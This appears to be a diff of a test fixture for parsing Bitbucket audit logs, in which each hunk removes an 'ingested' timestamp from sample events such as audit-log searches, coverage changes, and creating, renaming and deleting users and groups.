@@ -574,7 +567,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020775250Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:12.364Z - 2021-11-27T17:35:33.093Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"100\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"57 - 156\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034545,\"nano\":810000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -646,7 +638,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020775974Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:12.363Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"56\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 56\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034546,\"nano\":331000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -705,7 +696,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020776698Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"global_config_and_administration : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"global_config_and_administration : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":991000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -770,7 +760,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020777431Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"end_user_activity : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"end_user_activity : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":993000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -835,7 +824,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020778782Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"user_management : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"user_management : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -900,7 +888,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020779528Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"local_config_and_administration : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"local_config_and_administration : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -965,7 +952,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020780261Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"ecosystem : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"ecosystem : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1030,7 +1016,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020781039Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"permissions : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"permissions : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1095,7 +1080,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020781771Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"security : base\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"key\":\"Coverage Level\",\"to\":\"security : full\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034577,\"nano\":994000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1159,7 +1143,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:41.020782630Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"i18nKey\":\"atlassian.audit.event.change.retention\",\"key\":\"Retention\",\"to\":\"3 Years\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034578,\"nano\":370000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1237,7 +1220,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020783370Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"67 - 166\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:18.850Z - 2021-11-27T17:36:18.370Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"100\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034578,\"nano\":873000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1309,7 +1291,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020784099Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"66\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:18.849Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 66\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034579,\"nano\":269000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1375,7 +1356,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.usercreated", - "ingested": "2021-12-24T00:37:41.020784942Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034600,\"nano\":674000000},\"version\":\"1.0\"}", "type": [ "user", 
@@ -1466,7 +1446,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:41.020785680Z", "original": "{\"affectedObjects\":[{\"id\":\"stash-users\",\"name\":\"stash-users\",\"type\":\"GROUP\"},{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"stash-users\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"stash-users\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034600,\"nano\":692000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -1545,7 +1524,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupcreated", - "ingested": "2021-12-24T00:37:41.020786407Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"User group created\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupcreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034684,\"nano\":808000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -1636,7 +1614,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:41.020787210Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"},{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"asdf\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034696,\"nano\":687000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -1731,7 +1708,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipdeleted", - "ingested": "2021-12-24T00:37:41.020788047Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"},{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted from user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipdeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"asdf\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":\\\"test\\\",\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034703,\"nano\":209000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -1810,7 +1786,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupdeleted", - "ingested": "2021-12-24T00:37:41.020788777Z", "original": "{\"affectedObjects\":[{\"id\":\"asdf\",\"name\":\"asdf\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"User group deleted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupdeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdf\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034709,\"nano\":423000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1885,7 +1860,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020789513Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"test\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User password changed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercredentialupdated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034722,\"nano\":151000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.usercredentialupdated", 
@@ -1977,7 +1951,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userrenamed", - "ingested": "2021-12-24T00:37:41.020790239Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Username changed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userrenamed\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"test\",\"i18nKey\":\"bitbucket.service.user.audit.attribute.user.name\",\"key\":\"Username\",\"to\":\"test.user\"}],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test.user\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"oldUsername\\\":\\\"test\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034733,\"nano\":360000000},\"version\":\"1.0\"}", "type": [ "user", 
@@ -2055,7 +2028,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userdeleted", - "ingested": "2021-12-24T00:37:41.020791048Z", "original": "{\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userdeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"test.user\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034738,\"nano\":87000000},\"version\":\"1.0\"}", "type": [ "user", 
@@ -2126,7 +2098,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020791783Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034756,\"nano\":414000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -2205,7 +2176,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020792513Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"177\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:38:58.087Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 177\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034756,\"nano\":499000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2285,7 +2255,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.projectpermissiongranted", - "ingested": "2021-12-24T00:37:41.020793254Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"~ADMIN\",\"type\":\"PROJECT\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.projectpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"PROJECT_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"PROJECT_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"~ADMIN\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035568,\"nano\":728000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2357,7 +2326,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreated", - "ingested": "2021-12-24T00:37:41.020794028Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"~ADMIN\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"~ADMIN\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035568,\"nano\":751000000},\"version\":\"1.0\"}", "type": [ "creation" 
